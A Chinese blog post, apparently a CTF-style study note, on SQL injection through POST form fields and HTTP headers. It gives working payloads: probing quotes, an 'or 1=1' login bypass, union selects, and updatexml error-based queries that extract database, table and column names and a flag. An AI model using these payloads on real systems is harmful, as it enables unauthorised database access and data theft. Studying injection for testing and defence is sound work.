POST注入与Head注入

最新推荐文章于 2024-08-29 15:50:50 发布
最新推荐文章于 2024-08-29 15:50:50 发布
阅读量258 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Boxbiu/article/details/112250165
版权

POST注入与Head注入

POST注入

post注入与get注入的区别在于表单的传递方式,无本质差别

get传参通过url编码,使用?来标识,数据量有限

post注入一般对输入框进行传参,数据量比较大

  1. 查询是否有注入点

    对输入框填入一些闭合的符号,看页面是否异常
    例如: ’ " ') ")

  2. 尝试使用万能密码

    admin或123465或 ’ or 1=1 #

  3. post注入

    ' or 1=1 order by 1
' or 1=2 union select 1,2,3#

    接下来的步骤与get注入类似

Head注入

  1. 报错注入原理

    登录成功后通过brup抓包,将标记字段中的内容替换为updatexml函数,通过sql报错来显示我们要查询的内容

在这里插入图片描述

​ updatexml() 更新xml文档的函数

在这里插入图片描述
在这里插入图片描述

#号前闭合,后注释

在这里插入图片描述

用and的时候,前面的错了,则后面的不执行;前面的对了,则后面的执行;
用or的时候,前面的对了,则后面的不执行;前面的错了,则后面的执行;

sql语句在concat中可以被执行,16进制也能自动转义 0x7e为~符号 在upxml函数中加入特殊符号使其报错

可能的注入点 referer: user-agent: x-forwarded-for

  1. 登录成功后抓包

在这里插入图片描述

由此判断存在head注入,并且insert into 可能有两个字段

  1. 通过updatexml函数获取库名

    updatexml(123,concat('~',(select database())),123)
'or updatexml(1,concat(0x7e,(select database())),1),1)#

在这里插入图片描述

  1. 查询表名

    ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=database())),1),1) #

  2. 查询字段名

    ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag_head’)),1),1) #

  3. 查询数据拿到flag

    ' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #
Boxbiu
关注
专栏目录
深入分析SQL注入攻击及安全防范
10-31
这种方式将用户输入与SQL语句分离,确保即使用户输入包含特殊字符也不会改变SQL语句的含义。 2. **输入验证**:对用户输入进行严格的验证,只接受预期格式的数据,例如,如果期望用户输入数字,则应拒绝任何非数字...
记web学习之sql注入
weixin_45508323的博客
11-22 1160
记我滴web学习--sql注入前言对sql注入原理的理解工具页面请求方式与注释请求方式:GET和POSTGET请求POST请求hackbarburp suite注释方式:#和--+判断注入点 前言 第一次写博客0.0,尝试梳理记录一下自己学习的知识点,也方便日后复习叭。 如果能帮到有需要的人那可真是太好了。 对sql注入原理的理解 sql 注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我认为sql注入就是将要注入的sql命令置于表单
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 8354
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
pikachu漏洞练习第四章节SQL注入-数字型注入post)练习收获
最新发布
kaka6764的博客
08-29 437
因为1=1恒成立,也就是说无论id是多少,都会输出对应的数据字段:我们把一段只输出规定id数据的sql语句改成了输出全部数据字段的sql语句。发现一个选项框和一个查询钮,随意选一数字查询,发现网页把数据库中查询到的数据按照我们搜索的编号输出出来。我们的输入的id在sql语句的最后,如果我们能把最后的$id由原来的序号改为1 or 1=1,那么原sql语句将变为。为了验证我们的猜想。在右边的响应中查看源码可见页面输出了数据库中的所有数据,点击响应下的页面渲染,可见页面渲染的样子。通过注入点取期望得到的数据。
2、MyBatis增删改查
qq_63486066的博客
10-19 121
2、MyBatis增删改查 1.增删改查 mapper接口: public interface UserMapper { //增 int insertUser(); //改 void updateUser(); //删 void deleteUser(); //根据id查 User getUserById(); //查询所有的用户信息 List<User> getAllUser(); } 映射文件: <!--void updateUser()--> <inser
SQL注入教程——(一)SQL注入原理
hijack89的博客
07-23 3712
前置技能 了解SQL语言、语法、操作、常用函数 (基本的SQL数据库操作是进行SQL注入攻击的基础) 了解PHP语言,以及PHP+SQL的常用组合操作 了解网站架构、不同数据库的差异 了解burp suite、sqlmap等工具 本文以假设存在的www.test.com/index.php 注入页面为例1.什么是SQL注入所谓SQL注入,就是通过把SQL命令插入到 Web表单提交 或 URL 或
SQL注入基础
qq_51360929的博客
05-03 631
4.1 SQL注入的基础 4.1.1.介绍SQL注入 ​ SQL注入的指的是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是我们唯一可控的,因此我们可以让参数代入数据库查询,我们可以通过传入不同的SQL语句实现对数据库的操作。 ​ 一般情况下可对SQL语句进行选用,根据不同情况选择不同语句到达我们想要的效果。 4.1.2SQL注入原理 ​ 原理为通过对于SQL语句的巧妙构造来让我们的语句注入本不能达到的后端代码中 4.1.3 union攻击的具体实现以及分析 ​ 测试地址 127.0.0.
php AJAX POST的使用实例代码
12-02
AJAX(Asynchronous JavaScript and XML)允许我们在不刷新整个网页的情况下与服务器交换数据并更新部分网页内容。在这个实例中,我们将展示如何通过AJAX向PHP服务器发送POST请求,并接收响应。 首先,我们来看HTML...
Ajax基础与登入教程
10-20
这里需要注意的是,为了安全起见,通常密码会在客户端进行加密后再发送到服务器,且服务器端也需要进行严格的验证逻辑,防止SQL注入等安全问题。 总的来说,Ajax在现代Web开发中扮演着至关重要的角色,它使得网页变...
xUtils3:Android orm,位图,http,视图注入
02-15
请求协议支持11种谓词:GET,POST,PUT,PATCH,HEAD,MOVE,COPY,DELETE,OPTIONS,TRACE,CONNECT 支持超大文件(超过2G)上传 支持断点下载(如果服务端支持Range参数,客户端自动处理断点下载) 支持cookie...
SQL注入渗透与防御
yk2909438315的博客
07-10 2417
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。web应用程序:移动端的app或PC端的网站网页。
SQL注入漏洞
weixin_68681298的博客
07-21 638
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。
Mysql(验证用户登录)
giaogege666的博客
10-17 803
prepareStatement(String sql)是有参数的,返回的值是PreparedStatement类(pstmt)但是preparestatement中的executeQuery();1.输入用户名随便 密码:a' or 'a' = 'a。1,sql注入问题:在拼接sql时候有特殊sql参与拼接造成安全性问题。2.解决sql注入问题使用PrepareStatement。预编译的sql参数使用占位符?PrepareStatement:执行sql对象。
php query 查询语句,think-php 中查询语句 execute 和 query 区别
weixin_33513218的博客
03-22 307
ThinkPHP中execute()和query()方法都可以在参数里直接输入SQL语句。不同的是execute()通常用来执行insert或update等SQL语句,而query常用来执行select等语句。execute()方法将返回影响的记录数,如果执行SQL的select语句的话,返回的结果将是表的总记录数:$model = M( "MyTable" );$result = $model ...
PHP学习笔记(二)--数据库操作
数据之道
11-24 8063
下面使用简单的例子说下在PHP中操作MySql数据库,内容包括连接数据库、查询操作、事务及存储过程。 1、访问MySql一般步骤 1)连接MySql服务器 使用mysql_connect()函数建立与MySql服务器的连接。 2)选择MySql数据库 使用mysql_select_db()函数选择MySql服务器上的数据库,并与数据库建立连接。 3)执行SQL语句 使用mysql_q...
SQL注入简介
kinght的博客
01-30 983
SQL全称是“结构化查询语言”,最早是IBM为关系数据库系统SYSTEMR开发的一种查询语言,SQL语言结构简洁,功能强大,简单易学,所以IBM于1981年推出后得到了广泛的应用在1998年12月的《Phack》第54期,名为rfp的黑客发表了一篇名为“NT Webs Technology Vulnerabilities”的文章,随后一种在OWASP TOP10排行榜霸榜多年名为SQL注入的漏洞来到了世人的眼前原文地址:http://phrack.org/issues/54/8.html。
SQL注入详解(第四章查询方式及报错)
m0_52051132的博客
09-17 1241
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显得原因可能时SQL语句查询方式问题导致,这个时候我们需要用到报错或者盲注进行后续操作,同时在注入的过程中,提前了解其中SQL语句可以更好的选择对应的注入语句。select 查询数据例如:在网站应用中进行数据显示查询操作。
sql注入攻击
qq_36030342的博客
09-07 945
比如 你的检测语句是 select * from user where name=‘“变量1”’ and password=‘变量2’ 如果能找到记录则判定登陆成功。 那么对方如果在填写用户名和密码的时候写 密码 1' or ’1‘='1 吧这个替换到 你最后形成的sql 语句就变成了 select * from user where name=‘ 1' or ‘1’='1’ an
帮我优化一下代码以防止xss攻击与mysql注入攻击
06-10
好的,以下是对代码进行优化,以防止XSS攻击和MySQL注入攻击的建议: 1. 防止XSS攻击 在输出用户输入的内容时,应该对特殊字符进行转义,以避免XSS攻击。 ```php $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8'); $password = htmlspecialchars($_POST['password'], ENT_QUOTES, 'UTF-8'); ``` 这里使用了htmlspecialchars()函数来对输入的内容进行转义,第一个参数是要转义的字符串,第二个参数是转义规则,第三个参数是字符集。 2. 防止MySQL注入攻击 在执行SQL语句时,应该使用预处理语句和绑定参数,以避免MySQL注入攻击。 ```php // 验证用户名和密码是否正确 $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username AND password = SHA(:password)'); $stmt->bindParam(':username', $username); $stmt->bindParam(':password', $password); $stmt->execute(); // 获取查询结果 $user = $stmt->fetch(PDO::FETCH_ASSOC); ``` 这里使用了PDO预处理语句和绑定参数,可以防止SQL注入攻击。在预处理语句中使用占位符(:username和:password),然后使用bindParam()函数将变量绑定到占位符上。在执行查询时,PDO会自动将变量进行转义,从而保护查询安全。 综上所述,以下是对代码进行优化后的示例: ```php <?php session_start(); // 启动会话 if ($_SERVER['REQUEST_METHOD'] == 'POST') { // 防止XSS攻击 $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8'); $password = htmlspecialchars($_POST['password'], ENT_QUOTES, 'UTF-8'); // 链接数据库 $dsn = 'mysql:host=localhost;dbname=test;charset=utf8mb4'; $pdo = new PDO($dsn, 'root', ''); // 防止MySQL注入攻击 $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username AND password = SHA(:password)'); $stmt->bindParam(':username', $username); $stmt->bindParam(':password', $password); $stmt->execute(); // 获取查询结果 $user = $stmt->fetch(PDO::FETCH_ASSOC); if ($user) { // 登录成功,将用户信息存储到会话中 $_SESSION['username'] = $username; header('location: index.php'); // 跳转到首页 exit; } else { // 登录失败,显示错误信息 $error = '用户名或密码错误'; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>登录</title> </head> <body> <?php if (isset($error)) { ?> <p><?php echo $error; ?></p> <?php } ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <label for="username">用户名:</label> <input type="text" name="username" required><br><br> <label for="password">密码:</label> <input type="password" name="password" required><br><br> <input type="submit" value="登录"> </form> </body> </html> ``` 这个示例代码中使用了htmlspecialchars()函数对用户输入进行转义,使用PDO预处理语句和绑定参数来执行SQL查询,可以有效地防止XSS攻击和MySQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值